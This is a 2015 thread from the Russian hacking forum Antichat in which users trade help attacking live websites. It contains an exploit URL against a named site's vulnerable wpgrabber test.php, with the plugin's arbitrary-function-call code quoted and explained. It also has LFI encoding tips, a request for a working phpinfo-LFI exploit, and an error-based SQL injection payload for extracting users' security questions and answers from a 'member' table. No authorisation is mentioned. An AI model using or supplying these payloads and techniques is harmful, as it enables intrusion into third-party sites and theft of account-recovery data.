ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.05.2015, 02:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
36068
Репутация:
0
|
|
Да, всё пробовала. Архив с темой тоже нельзя загружать
Version 3.9.6
|
|
|
|
14.05.2015, 17:23
|
|
Guest
Сообщений: n/a
Провел на форуме:
5548
Репутация:
0
|
|
Ребята, если есть LFI на сайте вида site.ru/param/LFI/1.
Поможет если слешдоты перевести в %HE%XX
|
|
|
|
14.05.2015, 21:13
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме:
883446
Репутация:
82
|
|
Код:
Code:
kratko-news.com/wp-content/plugins/wpgrabber/test.php?ajax=1&task=phpinfo
можно ли вывести что то кроме пхпинфо? вроде все перепробовал, нефига не хочет |
|
|
15.05.2015, 11:02
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от mazaxaka
mazaxaka said:
↑
Код:
Code:
kratko-news.com/wp-content/plugins/wpgrabber/test.php?ajax=1&task=phpinfo
можно ли вывести что то кроме пхпинфо? вроде все перепробовал, нефига не хочет Лезем на офф сайт - http://wpgrabber.ru/ , качаем плагин.
Открывает test.php
В самом начала видим:
Код:
Code:
if ($_GET['ajax']) {
$task = $_GET['task'];
//sleep(1);
$result = $task();
exit();
В самом конце видим:
Код:
Code:
function __start()
{
$('#display').html('');
$('#sbmt').hide();
$('#loading').show();
__echo('1. Тестированиe внешних запросов из php-функции file_get_contents()...');
$.get('?ajax=1&task=testFileGetContents', function( data ) {
__echo( data );
__echo('
2. Тестированиe работы библиотеки CURL...');
$.get('?ajax=1&task=testCurl', function( data ) {
__echo( data );
__echo('
3. Тестированиe внешних запросов из php-функции copy()...');
$.get('?ajax=1&task=testCopy', function( data ) {
__echo( data );
__echo('
4. Тестированиe сохранения файла из php-функции file_get_contents()...');
$.get('?ajax=1&task=testFileGetContentsSaveFile', function( data ) {
__echo( data );
__echo('
5. Тестированиe сохранения файла с помощью библиотеки CURL...');
$.get('?ajax=1&task=testCurlSaveFile', function( data ) {
__echo( data );
__echo('
Тестирование завершено!');
$('#sbmt').show();
$('#loading').hide();
То есть доступными функциями для тестирования будут те, которые описаны в скрипте + те, для вызоав которых не нужна передача аргументов.
Потому что итоговая строка строится как $func= $_GET['task'].'()'
Такие функции для php можешь посмотреть здесь -> http://php.net/manual/ru/ref.info.php
|
|
|
|
15.05.2015, 20:06
|
|
Участник форума
Регистрация: 16.02.2008
Сообщений: 177
Провел на форуме:
883446
Репутация:
82
|
|
Сообщение от BigBear
BigBear said:
↑
Лезем на офф сайт -
http://wpgrabber.ru/
, качаем плагин.
Открывает test.php
В самом начала видим:
Код:
Code:
if ($_GET['ajax']) {
$task = $_GET['task'];
//sleep(1);
$result = $task();
exit();
В самом конце видим:
Код:
Code:
function __start()
{
$('#display').html('');
$('#sbmt').hide();
$('#loading').show();
__echo('1. Тестированиe внешних запросов из php-функции file_get_contents()...');
$.get('?ajax=1&task=testFileGetContents', function( data ) {
__echo( data );
__echo('
2. Тестированиe работы библиотеки CURL...');
$.get('?ajax=1&task=testCurl', function( data ) {
__echo( data );
__echo('
3. Тестированиe внешних запросов из php-функции copy()...');
$.get('?ajax=1&task=testCopy', function( data ) {
__echo( data );
__echo('
4. Тестированиe сохранения файла из php-функции file_get_contents()...');
$.get('?ajax=1&task=testFileGetContentsSaveFile', function( data ) {
__echo( data );
__echo('
5. Тестированиe сохранения файла с помощью библиотеки CURL...');
$.get('?ajax=1&task=testCurlSaveFile', function( data ) {
__echo( data );
__echo('
Тестирование завершено!');
$('#sbmt').show();
$('#loading').hide();
То есть доступными функциями для тестирования будут те, которые описаны в скрипте + те, для вызоав которых не нужна передача аргументов.
Потому что итоговая строка строится как $func= $_GET['task'].'()'
Такие функции для php можешь посмотреть здесь ->
http://php.net/manual/ru/ref.info.phpпонятно, значит вариант дохлый,даже файлы конфига не прочитать
|
|
|
|
15.05.2015, 21:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
5548
Репутация:
0
|
|
Ребята, пробую phpinfo LFI пробить.
Во всех случаях временный файл удаляется раньше инклуда.
Ни у кого нету 100% рабочего сплойта, который не удаляется?
Отчего зависит время жизни tmp файла?
|
|
|
|
16.05.2015, 00:25
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от sunnyfruit
sunnyfruit said:
↑
Ребята, пробую phpinfo LFI пробить.
Во всех случаях временный файл удаляется раньше инклуда.
Ни у кого нету 100% рабочего сплойта, который не удаляется?
Отчего зависит время жизни tmp файла? как узнал, что удаляется? уверен, что создается? пробовал эксплоит написать, чтобы не вручную это делать?
|
|
|
|
17.05.2015, 06:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
50513
Репутация:
1
|
|
блин,вот всё из таблиц могу вывести,но вот нужную колонку никак не хочет выводить,мож я что не так делаю,запрос такой
'and(select 1 from(select count(*),concat((SELECT security_question FROM member WHERE member_id =1000),floor(rand(0)*2))x from information_schema.tables group by x)a)and' ????
может ещё есть какой вариант
|
|
|
|
17.05.2015, 13:53
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от madam
madam said:
↑
блин,вот всё из таблиц могу вывести,но вот нужную колонку никак не хочет выводить,мож я что не так делаю,запрос такой
'and(select 1 from(select count(*),concat((SELECT security_question FROM member WHERE member_id =1000),floor(rand(0)*2))x from information_schema.tables group by x)a)and' ????
может ещё есть какой вариант не смотрел корректность вектора, но запрос верный. какая ошибка? может там waf на member?
|
|
|
|
17.05.2015, 14:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
50513
Репутация:
1
|
|
Сообщение от faza02
faza02 said:
↑
не смотрел корректность вектора, но запрос верный. какая ошибка? может там waf на member? ошибку не показывает,просто обновляется страница,хотя из member можно извлечь всё кроме security_question и security_answer,(самые нужные)))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
